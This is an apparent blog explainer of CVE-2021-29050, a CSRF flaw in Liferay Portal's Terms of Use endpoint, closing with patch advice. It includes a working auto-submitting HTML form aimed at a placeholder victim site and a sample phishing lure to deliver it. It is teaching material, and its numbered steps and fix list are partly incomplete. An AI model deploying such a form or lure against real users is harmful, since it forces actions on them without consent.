---
Liferay Portal is a popular open-source platform for building websites and digital workspaces. However, it’s not immune to security flaws. CVE-2021-29050 is a real-world example of how web applications — even big, trusted ones — can be exposed to Cross-Site Request Forgery (CSRF) attacks.
In this post, I’ll walk you through what this vulnerability is, how it can be abused, and show an exclusive example of how an attacker could exploit it — step by step.
Liferay DXP 7.3 (before Service Pack 1) and 7.2 (before Fix Pack 11)
It allows an attacker to trick a logged-in user into *unknowingly* accepting the site’s terms of use. This is possible by exploiting a Cross-Site Request Forgery (CSRF) flaw on the Terms of Use acceptance page.
What’s a CSRF Attack?
A CSRF attack basically hijacks the trust a site has in a user’s browser session. If a user is already logged in, an attacker can craft a special request and get the user (via tricks, like links or hidden forms) to “perform” an action *as if they really meant to*, even if they never intended to.
For example, this is like tricking someone into clicking a button on a bank website without them knowing — just by getting them to visit a malicious webpage.
How Does This Vulnerability Work?
In Liferay Portal’s vulnerable versions, the page where users accept the Terms of Use does not have proper CSRF protection — like a one-time token that’s required every time a user does a sensitive action.
That means, *any web page*, anywhere on the internet, can submit a form request (or make a POST) to this Terms of Use endpoint and force the logged-in user to accept the terms — without their knowledge or consent.
Imagine a malicious website tricking you into accepting terms you never even read!
Exploiting CVE-2021-29050: Step-by-Step Example
Let’s look at how an attacker could actually do this.
1. Identify the Target Endpoint
In Liferay, when users are shown the Terms of Use page, they typically POST a request like this (for example):
POST /c/portal/accept_terms HTTP/1.1
Host: victim-liferay.com
...
acceptTerms=true
The attacker creates a simple HTML file like this
<!-- Attacker's CSRF Page: csrf.html -->
<html>
<body>
<form id="csrfForm" action="https://victim-liferay.com/c/portal/accept_terms"; method="POST">
<input type="hidden" name="acceptTerms" value="true">
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
When the user visits this page (while logged in to Liferay in another tab), the browser will automatically send the POST request and the server will *think* the user has accepted the Terms of Use.
The attacker sends a phishing email or chat message with a link to their malicious page
> "Hi, check out this funny picture!" (link to csrf.html)
4. Victim Visits Link
If the victim is already logged in to the Liferay site (in another tab/browser session), simply loading the attacker's page will trigger the POST request silently.
5. Result: Terms Accepted Without User Consent
Now the victim has ‘accepted’ the Terms of Use — without even visiting the page, or reading a word.
Liferay DXP 7.2 Fix Pack 11 and later
If you use an older version, update immediately.
Developers: Always use CSRF tokens on *ALL* state-changing forms (POST, PUT, DELETE, etc.).
References
- Liferay Release Notes for 7.3.6 (see Security Issues)
- Liferay Security Advisory - CVE-2021-29050
- NVD CVE-2021-29050 Detail
- OWASP - Cross-Site Request Forgery (CSRF)
Conclusion
CSRF vulnerabilities may seem simple, but they can have serious consequences — and can be exploited with just a few lines of code. If you’re running Liferay Portal or Liferay DXP, make sure you’re on a patched version, and always watch out for things like CSRF protection whenever you develop or manage any kind of web application.
If you want to test your own site — log in, open the browser’s dev tools, and try posting to the Terms of Use endpoint *without* the legitimate form. If it works, you’re at risk!
Timeline
Published on: 02/20/2024 22:15:08 UTC
Last modified on: 08/01/2024 13:42:11 UTC